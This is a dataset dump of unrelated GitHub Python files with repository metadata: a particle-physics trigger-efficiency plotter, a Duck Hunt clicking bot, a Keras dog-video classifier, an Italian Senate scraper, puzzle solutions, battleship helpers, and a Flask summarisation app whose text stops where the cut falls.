ROOT.TProfile2D(\"eff_pt1_pt2_lowEta1_veryCoarse\",\"eff_pt1_pt2_lowEta1_veryCoarse\", len(pt_thresholds_veryCoarse)-1, array.array('d',pt_thresholds_veryCoarse), len(pt_thresholds_veryCoarse)-1, array.array('d',pt_thresholds_veryCoarse))\neff_pt1_pt2_lowEta1_veryCoarse.GetXaxis().SetTitle(\"p_{T} of leading lepton\")\neff_pt1_pt2_lowEta1_veryCoarse.GetYaxis().SetTitle(\"p_{T} of trailing lepton\")\neff_pt1_pt2_lowEta1_veryCoarse.style = styles.errorStyle( ROOT.kBlack )\n\neff_pt1_eta1 = ROOT.TProfile2D(\"eff_pt1_eta1\",\"eff_pt1_eta1\", len(pt_thresholds_coarse)-1, array.array('d',pt_thresholds_coarse), len(eta_thresholds_coarse)-1, array.array('d',eta_thresholds_coarse))\neff_pt1_eta1.GetXaxis().SetTitle(\"p_{T} of leading lepton\")\neff_pt1_eta1.GetYaxis().SetTitle(\"#eta of leading lepton\")\neff_pt1_eta1.style = styles.errorStyle( ROOT.kBlack )\n\neff_pt2_eta2 = ROOT.TProfile2D(\"eff_pt2_eta2\",\"eff_pt2_eta2\", len(pt_thresholds_coarse)-1, array.array('d',pt_thresholds_coarse), len(eta_thresholds_coarse)-1, array.array('d',eta_thresholds_coarse))\neff_pt2_eta2.GetXaxis().SetTitle(\"p_{T} of trailing lepton\")\neff_pt2_eta2.GetYaxis().SetTitle(\"#eta of trailing lepton\")\neff_pt2_eta2.style = styles.errorStyle( ROOT.kBlack )\n\nlogger.info( \"Sample: %s\" % data.name )\n\ndef leptonSelectorString(index, ptCut):\n return '('+muonSelectorString(index=index, ptCut=ptCut)+'||'+eleSelectorString(index=index, ptCut=ptCut)+')'\n\nif args.mode=='doubleMu':\n selString = muonSelectorString\nelif args.mode=='doubleEle':\n selString = eleSelectorString\nelif args.mode== 'muEle':\n selString = leptonSelectorString\nelse: \n raise ValueError( \"Mode %s not known\" % args.mode )\n\nselection_string = \"&&\".join( str_ for str_ in [\\\n 'Sum$('+selString(ptCut=0,index=None)+')==2' if args.mode in ['doubleMu', 'doubleEle'] \n else 'Sum$('+muonSelectorString(ptCut=0,index=None)+')==1&&Sum$('+eleSelectorString(ptCut=0,index=None)+')==1', \n args.baseTrigger,\n args.selection\n ] if str_ )\n\n\nplot_string_pt1 = args.dileptonTrigger+\":MaxIf$(LepGood_pt,\"+selString(index=None,ptCut=0)+\")>>eff_pt1\"\nplot_string_pt2 = args.dileptonTrigger+\":MinIf$(LepGood_pt,\"+selString(index=None,ptCut=0)+\")>>eff_pt2\"\n\nlogger.info( \"Plot string: %s\" % plot_string_pt1 )\nlogger.info( \"Selection: %s\" % selection_string )\n \ndata.chain.Draw(plot_string_pt1, selection_string, 'goff')\ndata.chain.Draw(plot_string_pt2, selection_string, 'goff')\n\ndata.chain.Draw(\"Sum$(Jet_pt*(Jet_pt>30&&abs(Jet_eta)<2.4&&Jet_id))>>ht\", selection_string, 'goff')\n\nplot_string_eta1 = args.dileptonTrigger+\":LepGood_eta>>eff_eta1\"\ndata.chain.Draw(plot_string_eta1, selection_string+\"&&LepGood_pt==MaxIf$(LepGood_pt,\"+selString(index=None,ptCut=0)+')', 'goff') \n\nplot_string_eta2 = args.dileptonTrigger+\":LepGood_eta>>eff_eta2\"\ndata.chain.Draw(plot_string_eta2, selection_string+\"&&LepGood_pt==MinIf$(LepGood_pt,\"+selString(index=None,ptCut=0)+')', 'goff') \n\nplot_string_pt1_pt2 = args.dileptonTrigger+\":MinIf$(LepGood_pt,\"+selString(index=None,ptCut=0)+\"):MaxIf$(LepGood_pt,\"+selString(index=None,ptCut=0)+\")>>eff_pt1_pt2\"\ndata.chain.Draw(plot_string_pt1_pt2, selection_string, 'goff')\nplot_string_pt1_pt2_veryCoarse = args.dileptonTrigger+\":MinIf$(LepGood_pt,\"+selString(index=None,ptCut=0)+\"):MaxIf$(LepGood_pt,\"+selString(index=None,ptCut=0)+\")>>eff_pt1_pt2_veryCoarse\"\ndata.chain.Draw(plot_string_pt1_pt2_veryCoarse, selection_string, 'goff')\n\nif args.mode=='muEle':\n # split high/low wrt muon\n 
plot_string_pt1_pt2_highEta1_veryCoarse = args.dileptonTrigger+\":MinIf$(LepGood_pt,\"+selString(index=None,ptCut=0)+\"):MaxIf$(LepGood_pt,\"+selString(index=None,ptCut=0)+\")>>eff_pt1_pt2_highEta1_veryCoarse\"\n data.chain.Draw(plot_string_pt1_pt2_highEta1_veryCoarse, selection_string+\"&&Sum$(abs(LepGood_pdgId)==13&&abs(LepGood_eta)>1.5&&\"+selString(index=None,ptCut=0)+')==1', 'goff')\n\n plot_string_pt1_pt2_lowEta1_veryCoarse = args.dileptonTrigger+\":MinIf$(LepGood_pt,\"+selString(index=None,ptCut=0)+\"):MaxIf$(LepGood_pt,\"+selString(index=None,ptCut=0)+\")>>eff_pt1_pt2_lowEta1_veryCoarse\"\n data.chain.Draw(plot_string_pt1_pt2_lowEta1_veryCoarse, selection_string+\"&&Sum$(abs(LepGood_pdgId)==13&&abs(LepGood_eta)<=1.5&&\"+selString(index=None,ptCut=0)+')==1', 'goff')\nelse:\n # split high/low wrt leading lepton\n plot_string_pt1_pt2_highEta1_veryCoarse = args.dileptonTrigger+\":MinIf$(LepGood_pt,\"+selString(index=None,ptCut=0)+\"):MaxIf$(LepGood_pt,\"+selString(index=None,ptCut=0)+\")>>eff_pt1_pt2_highEta1_veryCoarse\"\n data.chain.Draw(plot_string_pt1_pt2_highEta1_veryCoarse, selection_string+\"&&Sum$(abs(LepGood_eta)>1.5&&LepGood_pt==MaxIf$(LepGood_pt,\"+selString(index=None,ptCut=0)+'))==1', 'goff')\n\n plot_string_pt1_pt2_lowEta1_veryCoarse = args.dileptonTrigger+\":MinIf$(LepGood_pt,\"+selString(index=None,ptCut=0)+\"):MaxIf$(LepGood_pt,\"+selString(index=None,ptCut=0)+\")>>eff_pt1_pt2_lowEta1_veryCoarse\"\n data.chain.Draw(plot_string_pt1_pt2_lowEta1_veryCoarse, selection_string+\"&&Sum$(abs(LepGood_eta)<=1.5&&LepGood_pt==MaxIf$(LepGood_pt,\"+selString(index=None,ptCut=0)+'))==1', 'goff')\n\nplot_string_pt1_eta1 = args.dileptonTrigger+\":LepGood_eta:MaxIf$(LepGood_pt,\"+selString(index=None,ptCut=0)+\")>>eff_pt1_eta1\"\ndata.chain.Draw(plot_string_pt1_eta1, selection_string+\"&&LepGood_pt==MaxIf$(LepGood_pt,\"+selString(index=None,ptCut=0)+')', 'goff')\n\nplot_string_pt2_eta2 = args.dileptonTrigger+\":LepGood_eta:MinIf$(LepGood_pt,\"+selString(index=None,ptCut=0)+\")>>eff_pt2_eta2\"\ndata.chain.Draw(plot_string_pt2_eta2, selection_string+\"&&LepGood_pt==MinIf$(LepGood_pt,\"+selString(index=None,ptCut=0)+')', 'goff')\n\n\nprefix = preprefix+\"_%s_%s_measuredIn%s_minLeadLepPt%i\" % ( triggerName, 'baseTrigger_METhadronic', args.sample, args.minLeadingLeptonPt)\nif args.small: prefix = \"small_\" + prefix\n\nfrom StopsDilepton.tools.user import plot_directory\nplot_path = os.path.join(plot_directory, args.plot_directory, prefix)\n\nplotting.draw(\n Plot.fromHisto(name = 'pt1_'+triggerName, histos = [[ eff_pt1 ]], texX = \"p_{T} of leading lepton\", texY = triggerName),\n plot_directory = plot_path, #ratio = ratio, \n logX = False, logY = False, sorting = False,\n yRange = (0,1), legend = None ,\n # scaling = {0:1},\n # drawObjects = drawObjects( dataMCScale )\n)\nplotting.draw(\n Plot.fromHisto(name = 'pt2_'+triggerName, histos = [[ eff_pt2 ]], texX = \"p_{T} of trailing lepton\", texY = triggerName),\n plot_directory = plot_path, #ratio = ratio, \n logX = False, logY = False, sorting = False,\n yRange = (0,1), legend = None ,\n # scaling = {0:1},\n # drawObjects = drawObjects( dataMCScale )\n)\nplotting.draw(\n Plot.fromHisto(name = 'eta1_'+triggerName, histos = [[ eff_eta1 ]], texX = \"#eta of leading lepton\", texY = triggerName),\n plot_directory = plot_path, #ratio = ratio, \n logX = False, logY = False, sorting = False,\n yRange = (0,1), legend = None ,\n # scaling = {0:1},\n # drawObjects = drawObjects( dataMCScale )\n)\nplotting.draw(\n Plot.fromHisto(name = 
'eta2_'+triggerName, histos = [[ eff_eta2 ]], texX = \"#eta of trailing lepton\", texY = triggerName),\n plot_directory = plot_path, #ratio = ratio, \n logX = False, logY = False, sorting = False,\n yRange = (0,1), legend = None ,\n # scaling = {0:1},\n # drawObjects = drawObjects( dataMCScale )\n)\nplotting.draw(\n Plot.fromHisto(name = \"ht_\"+triggerName, histos = [[ ht ]], texX = \"H_{T} (GeV)\", texY = \"Number of events\"),\n plot_directory = plot_path, #ratio = ratio, \n logX = False, logY = True, sorting = False,\n yRange = (0.3,\"auto\"), legend = None ,\n # scaling = {0:1},\n # drawObjects = drawObjects( dataMCScale )\n)\n\nROOT.gStyle.SetPadRightMargin(0.15)\nROOT.gStyle.SetPaintTextFormat(\"2.2f\")\nfor name, plot in [\n [\"pt1_pt2\", eff_pt1_pt2],\n [\"pt1_pt2_veryCoarse\", eff_pt1_pt2_veryCoarse],\n [\"pt1_pt2_lowEta1_veryCoarse\", eff_pt1_pt2_lowEta1_veryCoarse],\n [\"pt1_pt2_highEta1_veryCoarse\", eff_pt1_pt2_highEta1_veryCoarse],\n [\"pt1_eta1\", eff_pt1_eta1],\n [\"pt2_eta2\", eff_pt2_eta2],\n ]:\n c1 = ROOT.TCanvas()\n if 'veryCoarse' in name:\n plot.SetMarkerSize(0.8)\n #plot.Draw(\"COLZTextE\")\n plot.Draw(\"COLZText\")\n else:\n plot.Draw(\"COLZ\" )\n\n plot.GetZaxis().SetRangeUser(0,1)\n c1.Print(os.path.join(plot_path, triggerName+'_'+name+'.png') )\n c1.Print(os.path.join(plot_path, triggerName+'_'+name+'.pdf') )\n c1.Print(os.path.join(plot_path, triggerName+'_'+name+'.root') )\n del c1\n\nofile = ROOT.TFile.Open(os.path.join(plot_path, prefix+'.root'), 'recreate')\neff_pt1.Write()\neff_pt2.Write()\neff_eta1.Write()\neff_eta2.Write()\neff_pt1_pt2.Write()\neff_pt1_pt2_highEta1_veryCoarse.Write()\neff_pt1_pt2_lowEta1_veryCoarse.Write()\neff_pt1_eta1.Write()\neff_pt2_eta2.Write()\nht.Write()\nofile.Close()\n","repo_name":"HephyAnalysisSW/StopsDilepton","sub_path":"plots/plotsRobert/2016/trigger/triggerEff.py","file_name":"triggerEff.py","file_ext":"py","file_size_in_byte":14908,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"237917827","text":"import win32gui\n\nimport numpy as np\nimport cv2\nimport time\nimport pyautogui\nfrom PIL import ImageGrab\n\nJogarJogo = True\nVerMascaras = False\nVerRetangulos = False\ncor_pato_preto = np.array([0,0,0])\ncor_minima_pato_vermelho = np.array([170,50,50]) # Range mínimo para a cor vermelha\ncor_maxima_pato_vermelho = np.array([180,255,255]) # Range máximo para a cor vermelha\n\ntoplist, winlist = [], []\n\ndef enum_cb(hwnd, results):\n winlist.append((hwnd, win32gui.GetWindowText(hwnd)))\nwin32gui.EnumWindows(enum_cb, toplist)\n\n\nfirefox = [(hwnd, title) for hwnd, title in winlist if 'firefox' in title.lower()]\nfirefox = firefox[0]\nhwnd = firefox[0]\n\nvalores_desejados = [16,25,34,12,11,30]\nwin32gui.SetForegroundWindow(hwnd)\nbbox = win32gui.GetWindowRect(hwnd)\n\nwhile True:\n try:\n img = ImageGrab.grab(bbox)\n imgcv = np.array(img)\n imgcv = imgcv[:,:,::-1].copy()\n hsv = cv2.cvtColor(imgcv,cv2.COLOR_BGR2HSV)\n hsv = cv2.rectangle(hsv,(0,0),(800,250),(0,0,0),-1)\n hsv = cv2.rectangle(hsv,(0,550),(802,864),(0,0,0),-1)\n mascara_cor_preta = cv2.inRange(hsv, cor_pato_preto, cor_pato_preto)\n mascara_cor_vermelha = cv2.inRange(hsv,cor_minima_pato_vermelho,cor_maxima_pato_vermelho)\n\n mascaras_combinadas = cv2.bitwise_or(mascara_cor_vermelha,mascara_cor_preta)\n contornos, hierarquia = cv2.findContours(mascaras_combinadas,cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_NONE)\n for contorno in contornos:\n x, y, w, h = cv2.boundingRect(contorno)\n if ( h in 
valores_desejados):\n if (JogarJogo and not VerMascaras and not VerRetangulos):\n middlex = int(x + w / 2)\n middley = int(y + h / 2)\n pyautogui.click(middlex, middley)\n print (\"Atirou na posição: (\",middlex,middley,\")\")\n time.sleep(1.3)\n break\n if (VerRetangulos):\n cv2.rectangle(imgcv, (x, y), (x + w, y + h), (0, 0, 255), 2)\n\n if (VerMascaras):\n cv2.imshow('Mascara Pato',mascaras_combinadas)\n\n elif(VerRetangulos):\n cv2.imshow('Retangulo Pato',imgcv)\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n except Exception as e:\n print(e)\n exit()\n\n\ncv2.destroyAllWindows()\n","repo_name":"danilo94/OpenCVDuckHunter","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2357,"program_lang":"python","lang":"pt","doc_type":"code","stars":4,"dataset":"github-code","pt":"32"} +{"seq_id":"41631815365","text":"#!/usr/bin/python3\n# -*- coding:utf-8 -*-\n\nimport cv2, os, sys\nimport numpy as np\n#import tensorflow as tf\n#import keras\nfrom keras.preprocessing.image import array_to_img, img_to_array\nfrom keras.models import Sequential\nfrom keras.utils import np_utils, plot_model\nfrom keras.layers.core import Dense, Dropout, Activation, Flatten\nfrom keras.layers.convolutional import Conv2D, MaxPooling2D\nfrom sklearn.model_selection import train_test_split\nimport matplotlib\nmatplotlib.use('Agg')\nimport matplotlib.pyplot as plt\nimport pandas as pd\nfrom time import time\nvideo_dir = \"./Img/Dogs/\"\n#classes = [f for f in os.listdir(video_dir) if os.path.isdir(os.path.join(video_dir, f))]\nclasses = ['Car', 'Drink', 'Feed', 'LookLeft', 'LookRight', 'Pet', 'PlayBall', 'Shake', 'Sniff', 'Walk', 'TurnRight']\nclass_num = len(classes)\ntrain_x = []\ntrain_y = []\nepoch = 200\nbatch = 30 \nsavename = \"dog_mean\"\n#savename = \"plt_test\"\n\nfor i in range(class_num):\n# print(classes[i])\n datadir = os.path.join(video_dir,classes[i])\n #print(datadir)\n # = os.listdir(datadir)\n paths = [f for f in os.listdir(datadir) if os.path.isfile(os.path.join(datadir, f))]\n for j in paths:\n n = 0\n frames = []\n path = os.path.join(datadir,j)\n# print(path)\n cap = cv2.VideoCapture(path)\n ret, frame = cap.read()\n #while(cap.isOpened()):\n while(ret == True):\n #gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n #frame = img_to_array(frame)\n #frame = cv2.resize(frame, (24,24))\n frames.append(frame)\n ret, frame = cap.read()\n # cv2.imwrite('frame.png',gray)\n frames = (np.asarray(frames).mean(axis=0)) # the average overall frames\n train_x.append(frames)\n train_y.append(i)\n\n cap.release()\n\n#cv2.destroyAllWindows()\n\n#[0,1,2] -> [[1,0,0],[0,1,0],[0,0,1]]\ntrain_y = np_utils.to_categorical(train_y, class_num)\n# tmp = []\n# for i in train_y:\n# l = [0]*class_num\n# l[int(i)-1] = 1\n# tmp.append(l)\n# train_y = np.asarray(tmp)\ntrain_x, train_y = np.asarray(train_x), np.asarray(train_y)\ntrain_x = train_x.astype('float32')\ntrain_x = train_x / 255 # 画素値を0から1の範囲に変換\n\ntrain_x, test_x, train_y, test_y = train_test_split(train_x, train_y, test_size=0.33)#, random_state=111) #rand seed\n\n#モデルを作ってください.\nmodel = Sequential()\n\nmodel.add(Conv2D(32, (3, 3), padding='same',\n input_shape=train_x.shape[1:]))\nmodel.add(Activation('relu'))\nmodel.add(Conv2D(32, (3, 3)))\nmodel.add(Activation('relu'))\nmodel.add(MaxPooling2D(pool_size=(2, 2)))\nmodel.add(Dropout(0.25))\n\nmodel.add(Conv2D(64, (3, 3), padding='same'))\nmodel.add(Activation('relu'))\nmodel.add(Conv2D(64, (3, 3)))\nmodel.add(Activation('relu'))\nmodel.add(MaxPooling2D(pool_size=(2, 
2)))\nmodel.add(Dropout(0.25))\n\nmodel.add(Flatten())\nmodel.add(Dense(512))\nmodel.add(Activation('relu'))\nmodel.add(Dropout(0.5))\nmodel.add(Dense(class_num)) # クラスはn個\nmodel.add(Activation('softmax'))\n\n# コンパイル\nmodel.compile(loss='categorical_crossentropy',\n optimizer='SGD',\n metrics=['accuracy'])\nplot_model(model, to_file=\"Img/Models/\"+savename+\"_model.png\", show_shapes=True)\n\nsecc = time()\nhistory = model.fit(train_x, train_y, batch_size=batch, epochs=epoch,\n validation_data=(test_x, test_y), verbose=2)\ncost = time()-secc\n# plt.plot(history.history['acc'])\n# plt.plot(history.history['val_acc'])\n# plt.title('model accuracy')\n# plt.xlabel('epoch')\n# plt.ylabel('accuracy')\n# plt.legend(['acc', 'val_acc'], loc='lower right')\n# plt.savefig(\"Img/\"+savename+\"_acc.png\")\n\nfig, (ac, los) = plt.subplots(ncols=2, figsize=(10,4))\nac.plot(history.history['acc'])\nac.plot(history.history['val_acc'])\nac.set_title('model accuracy')\nac.set_xlabel('epoch')\nac.set_ylabel('accuracy')\nac.legend(['acc', 'val_acc'], loc='lower right')\nlos.plot(history.history['loss'])\nlos.plot(history.history['val_loss'])\nlos.set_title('model loss')\nlos.set_xlabel('epoch')\nlos.set_ylabel('loss')\nlos.legend(['loss', 'val_loss'], loc='upper right')\nfig.savefig(\"Img/\"+savename+\".png\")\n# 学習済みのModelを保存\nopen('./Models/'+savename+'.json',\"w\").write(model.to_json())\n# 学習済みの重みを保存\nmodel.save_weights('./Models/'+savename+'.h5')\n\n\n# テストデータに適用\npredict_classes = model.predict_classes(test_x)\n\n# マージ。yのデータは元に戻す\nmg_df = pd.DataFrame({'predict': predict_classes, 'class': np.argmax(test_y, axis=1)})\n\n# confusion matrix\nhge = pd.crosstab(mg_df['class'], mg_df['predict'])\n\nprint(hge)\nprint(\"fitting time: \", cost)\n","repo_name":"araki-t-uec/Works","sub_path":"Keras/dog_ResNet_train.py","file_name":"dog_ResNet_train.py","file_ext":"py","file_size_in_byte":4655,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"70902684252","text":"import requests\nimport string\nfrom lxml import html\nimport csv\n\n\nclass Senator:\n def __init__(self, name, link):\n self.name = name\n self.link = 'http://www.senato.it{}'.format(link)\n self.parties = []\n\n def set_parties(self, parties):\n self.parties = parties\n\n def __str__(self):\n return 'Senator: {}, url {}, parties {}'.format(self.name, self.link, self.parties)\n\n\ndef extract_senator_names(text):\n tree = html.fromstring(text)\n names = tree.xpath(\"//div[contains(@class, 'linkSenatore')]/p[1]/a/text()\")\n links = tree.xpath(\"//div[contains(@class, 'linkSenatore')]/p[1]/a/@href\")\n\n if len(names) is len(links):\n return [Senator(name, links[index]) for index, name in enumerate(names)]\n else:\n print('mmhh')\n\n\ndef get_all_senators(base_url):\n names_links = []\n for letter in string.ascii_lowercase:\n formatted_url = base_url.format(alphabet_letter=letter)\n print('Getting {}'.format(formatted_url))\n response = requests.get(formatted_url)\n\n if response.status_code == 200:\n name_link = extract_senator_names(response.text)\n names_links.extend(name_link)\n else:\n print('No senators at {}'.format(formatted_url))\n return names_links\n\n\ndef get_parties_from(link):\n response = requests.get(link)\n if response.status_code == 200:\n tree = html.fromstring(response.text)\n parties = tree.xpath(\"//a[starts-with(@href, 'http://www.senato.it/loc/link.asp?tipodoc=sgrp')]/text()\")\n return [party.strip() for party in parties]\n else:\n print('mmh. 
response was {}'.format(response))\n\n\ndef write_to_csv(legislature, senators_with_parties):\n filename = 'senators_and_parties/senators_parties_legislature_{}.csv'.format(legislature)\n print(\"Writing senators for legislature {} to file {}\".format(legislature, filename))\n data = [['NAME', 'PARTIES']]\n for senator in senators_with_parties:\n data.append([senator.name, ';'.join(senator.parties)])\n\n with open(filename, 'w+',\n encoding='utf-8') as myFile:\n writer = csv.writer(myFile, lineterminator='\\n')\n writer.writerows(data)\n\n\nif __name__ == '__main__':\n for legislature in [14, 15, 16, 17]:\n print('Getting legislature {}'.format(legislature))\n base_url = 'http://www.senato.it/leg/{legislature}/BGT/Schede/Attsen/Sen{{alphabet_letter}}.html'\n\n senators = get_all_senators(base_url.format(legislature=legislature))\n print(\"Got {} senators for legislature {}\".format(len(senators), legislature))\n\n for index, senator in enumerate(senators):\n print('Getting parties for senator {}/{}'.format(index + 1, len(senators)))\n senator.set_parties(get_parties_from(senator.link))\n\n write_to_csv(legislature, senators)\n print(\"Writing complete for legislature {}\".format(legislature))\n","repo_name":"damianiroberta/Italian-senate-amendments","sub_path":"senators_names.py","file_name":"senators_names.py","file_ext":"py","file_size_in_byte":2923,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"19437811571","text":"from StartUp.Boardgame.cell import Cell\n\n\ndef surrounding_area(row, column):\n \"\"\"\n :param row:\n :param column:\n :return: Program returns all the cells' indexes surrounding the given cell's row and column\n \"\"\"\n return [row - 1, column - 1], [row - 1, column], [row - 1, column + 1], \\\n [row, column - 1], [row, column], [row, column + 1], \\\n [row + 1, column - 1], [row + 1, column], [row + 1, column + 1]\n\n\ndef cleanup(no_go_zone):\n \"\"\"\n :param no_go_zone: A list of indexes\n :return: Program gets rid of duplicates and indexes that don't exist on the board and returns that list\n \"\"\"\n s = []\n for list in no_go_zone:\n if list not in s:\n if 0 <= list[0] <= 9 and 0 <= list[1] <= 9:\n s.append(list)\n\n return s\n\ndef get_int_from_letter(letter):\n \"\"\"\n :param letter:\n :return: Program returns the letter's index\n \"\"\"\n if letter.upper() == \"A\": return 0\n if letter.upper() == \"B\": return 1\n if letter.upper() == \"C\": return 2\n if letter.upper() == \"D\": return 3\n if letter.upper() == \"E\": return 4\n if letter.upper() == \"F\": return 5\n if letter.upper() == \"G\": return 6\n if letter.upper() == \"H\": return 7\n if letter.upper() == \"I\": return 8\n if letter.upper() == \"J\": return 9\n raise TypeError(f\"{letter} is outside the ocean! (Valid letters are between A and J - including both)\")\n\n\ndef get_letter_from_int(x):\n \"\"\"\n :param x:\n :return: Program returns the letter of that index\n \"\"\"\n if x == 0: return \"A\"\n if x == 1: return \"B\"\n if x == 2: return \"C\"\n if x == 3: return \"D\"\n if x == 4: return \"E\"\n if x == 5: return \"F\"\n if x == 6: return \"G\"\n if x == 7: return \"H\"\n if x == 8: return \"I\"\n if x == 9: return \"J\"\n raise TypeError(f\"{x} is outside the ocean! 
(Valid numbers are between 0 and 9 - including both)\")\n\ndef order_in_cells(list):\n \"\"\"\n :param list: A list of cells\n :return: Returns a list of cells similar to the first one but without their duplicates and without the cells\n that are \"out of the ocean\"\n \"\"\"\n # s = []\n # for cell in list:\n # if cell not in s:\n # if 0 <= cell.row <= 9 and 0 <= cell.column <= 9:\n # s.append(cell)\n\n l = list[:]\n for i in range (0,len(list)):\n for j in range(i+1, len(list)):\n if list[i].row==list[j].row and list[i].column==list[j].column:\n try:\n l.remove(list[j])\n except ValueError:\n pass\n if list[j].row<0 or list[j].row>9 or list[j].column<0 or list[j].column>9:\n try:\n l.remove(list[j])\n except ValueError:\n pass\n return l\n\n\ndef sunken_check(cell, one_way, another_way, player, board):\n \"\"\"\n Program goes along the row/column and checks all the cells for cell.ship==True until it finds a\n cell that has no ship on it (cell.ship=False) - when the program stops going that way.\n Every cell that is a \"good cell\" (meaning cell.ship=True) is appended in a list \"good_cells\".\n\n :param cell:\n :param one_way: parameter will either be the \"l\" cell (for left) or \"u\" cell (for up)\n :param another_way: parameter will either be \"r\" cell (for right) or \"d\" cell (for down)\n :param player: either human or computer\n :param board: either human's board or computer's board\n :return: A list of all the cells that are part of the ship\n \"\"\"\n good_cells = []\n if one_way.checked == one_way.ship == True: good_cells.append(one_way)\n if another_way.checked == another_way.ship == True: good_cells.append(another_way)\n if one_way.row == another_way.row:\n for i in range(one_way.column + 1, 10):\n current_cell = player.get_cell(board, cell.row, i)\n if current_cell.ship == False:\n break\n else:\n good_cells.append(current_cell)\n for j in range(another_way.column - 1, -1, -1):\n current_cell = player.get_cell(board, cell.row, j)\n if current_cell.ship == False:\n break\n else:\n good_cells.append(current_cell)\n else:\n for i in range(one_way.row + 1, 10):\n current_cell = player.get_cell(board, i, cell.column)\n if current_cell.ship == False:\n break\n else:\n good_cells.append(current_cell)\n for j in range(another_way.row - 1, -1, -1):\n current_cell = player.get_cell(board, j, cell.column)\n if current_cell.ship == False:\n break\n else:\n good_cells.append(current_cell)\n good_cells = order_in_cells(good_cells)\n # print(good_cells)\n return good_cells\n\n\ndef l_r_u_d_cells(cell, player, board):\n \"\"\"\n :param cell:\n :param player:\n :param board:\n :return: Function returns the cell to the left, right, up and down (in that order) of the give cell parameter\n \"\"\"\n if cell.column != 0:\n l_cell = player.get_cell(board, cell.row, cell.column - 1)\n else:\n l_cell = Cell(cell.row, cell.column, False, True)\n if cell.column != 9:\n r_cell = player.get_cell(board, cell.row, cell.column + 1)\n else:\n r_cell = Cell(cell.row, cell.column, False, True)\n if cell.row != 0:\n u_cell = player.get_cell(board, cell.row - 1, cell.column)\n else:\n u_cell = Cell(cell.row, cell.column, False, True)\n if cell.row != 9:\n d_cell = player.get_cell(board, cell.row + 1, cell.column)\n else:\n d_cell = Cell(cell.row, cell.column, False, True)\n return l_cell, r_cell, u_cell, 
d_cell\n","repo_name":"VaroDiana917/Battleship-BoardGame","sub_path":"StartUp/Functions/functionalities.py","file_name":"functionalities.py","file_ext":"py","file_size_in_byte":5719,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"41494700600","text":"class Solution:\n def isValidSudoku(self, board: List[List[str]]) -> bool:\n dic_row = [{} for _ in range(9)]\n dic_col = [{} for _ in range(9)]\n dic_box = [{} for _ in range(9)]\n \n for i in range(9):\n for j in range(9):\n if board[i][j] != \".\":\n num = int(board[i][j])\n box = (i // 3) * 3 + j // 3\n \n dic_row[i][num] = dic_row[i].get(num, 0) + 1\n dic_col[j][num] = dic_col[j].get(num, 0) + 1\n dic_box[box][num] = dic_box[box].get(num, 0) + 1\n \n if dic_row[i][num] > 1 or dic_col[j][num] > 1 or dic_box[box][num] > 1:\n return False\n \n return True","repo_name":"wangzihao0214/Leetcode","sub_path":"36. Valid Sudoku/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":807,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"34674014518","text":"import sys, math\nfrom collections import deque\n\ninput = sys.stdin.readline\nINF = sys.maxsize\n\n\ndef get_change_count(arr, row, col, answer1, answer2):\n question = [i[col - 8 : col] for i in arr[row - 8 : row]]\n\n result1, result2 = 0, 0\n for i in range(8):\n for j in range(8):\n if question[i][j] != answer1[i][j]:\n result1 += 1\n\n if question[i][j] != answer2[i][j]:\n result2 += 1\n\n return min(result1, result2)\n\n\ndef get_answer():\n answer1 = [[None for _ in range(8)] for _ in range(8)]\n answer2 = [[None for _ in range(8)] for _ in range(8)]\n for i in range(8):\n for j in range(8):\n if i % 2 == 0 and j % 2 == 1:\n answer1[i][j] = \"R\"\n answer2[i][j] = \"B\"\n\n elif i % 2 == 1 and j % 2 == 0:\n answer1[i][j] = \"R\"\n answer2[i][j] = \"B\"\n\n elif i % 2 == 1 and j % 2 == 1:\n answer1[i][j] = \"B\"\n answer2[i][j] = \"R\"\n\n elif i % 2 == 0 and j % 2 == 0:\n answer1[i][j] = \"B\"\n answer2[i][j] = \"R\"\n\n return answer1, answer2\n\n\ndef solve():\n Min = INF\n m, n = map(int, input().split(\" \"))\n arr = [list(input().rstrip()) for _ in range(m)]\n\n answer1, answer2 = get_answer()\n\n for i in range(8, m + 1):\n for j in range(8, n + 1):\n Min = min(Min, get_change_count(arr, i, j, answer1, answer2))\n\n print(Min)\n\n\nif __name__ == \"__main__\":\n solve()\n","repo_name":"kkIIun/Tobigs18_assignment","sub_path":"week3/Algorithm/3.py","file_name":"3.py","file_ext":"py","file_size_in_byte":1517,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"34169209298","text":"from subprocess import call\nfrom pymouse import PyMouse\nfrom pykeyboard import PyKeyboard\nimport time\n\nk = PyKeyboard()\nm = PyMouse()\nx_dim, y_dim = m.screen_size()\n\n\n# init minimize the execution window\nk.press_key('Command')\nk.tap_key('h')\nk.release_key('Command')\ntime.sleep(2)\nm.click(x_dim/2, y_dim/2, 1)\n\n\n# 301 - 770\nfor page in range(301, 770):\n m.click(154, 112, 1)\n time.sleep(0.1)\n k.tap_key('delete', n=3)\n time.sleep(0.1)\n k.type_string(str(page))\n time.sleep(0.1)\n k.tap_key('return')\n time.sleep(2)\n\n call([\"screencapture\", \"-R523,128,608,757\", \"page_\" + str(page) + 
\".png\"])\n","repo_name":"lukasfroehlich1/scrape-textbook","sub_path":"screen-cap.py","file_name":"screen-cap.py","file_ext":"py","file_size_in_byte":618,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"73384401372","text":"from app import app, genAbstract, logger\nfrom flask import render_template, request, jsonify, json, Response\n\n\n@app.route('/')\n@app.route('/index')\ndef index():\n summary_text = \"test\"\n return render_template('index.html', summary=summary_text)\n\n\n@app.route('/summary', methods=['POST'])\ndef get_summary():\n data = json.loads(request.form.get('data'))\n title = data['title']\n content = data['content']\n if title is None or len(title) == 0 or content is None or len(content) == 0:\n return jsonify({'status': -1, 'text': '参数异常'});\n else:\n logger.debug('title:%s \\n content:%s\\n' % (title, content))\n text = 